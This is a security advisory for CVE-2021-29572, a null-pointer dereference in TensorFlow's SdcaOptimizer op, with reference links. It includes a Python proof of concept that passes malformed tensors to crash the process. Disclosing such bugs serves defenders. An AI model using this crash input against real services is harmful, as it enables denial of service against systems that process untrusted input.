CVE-2021-29572: Reference binding to nullptr in `SdcaOptimizer`
(updated )
The implementation of tf.raw_ops.SdcaOptimizer
triggers undefined behavior due to dereferencing a null pointer:
import tensorflow as tf
sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]
sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)]
sparse_feature_values = []
dense_features = []
dense_weights = []
example_weights = tf.constant((0.0), dtype=tf.float32)
example_labels = tf.constant((0.0), dtype=tf.float32)
sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)]
sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)]
example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], dtype=tf.float32)
tf.raw_ops.SdcaOptimizer(
sparse_example_indices=sparse_example_indices,
sparse_feature_indices=sparse_feature_indices,
sparse_feature_values=sparse_feature_values, dense_features=dense_features,
example_weights=example_weights, example_labels=example_labels,
sparse_indices=sparse_indices, sparse_weights=sparse_weights,
dense_weights=dense_weights, example_state_data=example_state_data,
loss_type="logistic_loss", l1=0.0, l2=0.0, num_loss_partitions=1,
num_inner_iterations=1, adaptative=False)
References
- github.com/advisories/GHSA-5gqf-456p-4836
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-500.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-698.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-209.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb
- github.com/tensorflow/tensorflow/security/advisories/GHSA-5gqf-456p-4836
- nvd.nist.gov/vuln/detail/CVE-2021-29572
Detect and mitigate CVE-2021-29572 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →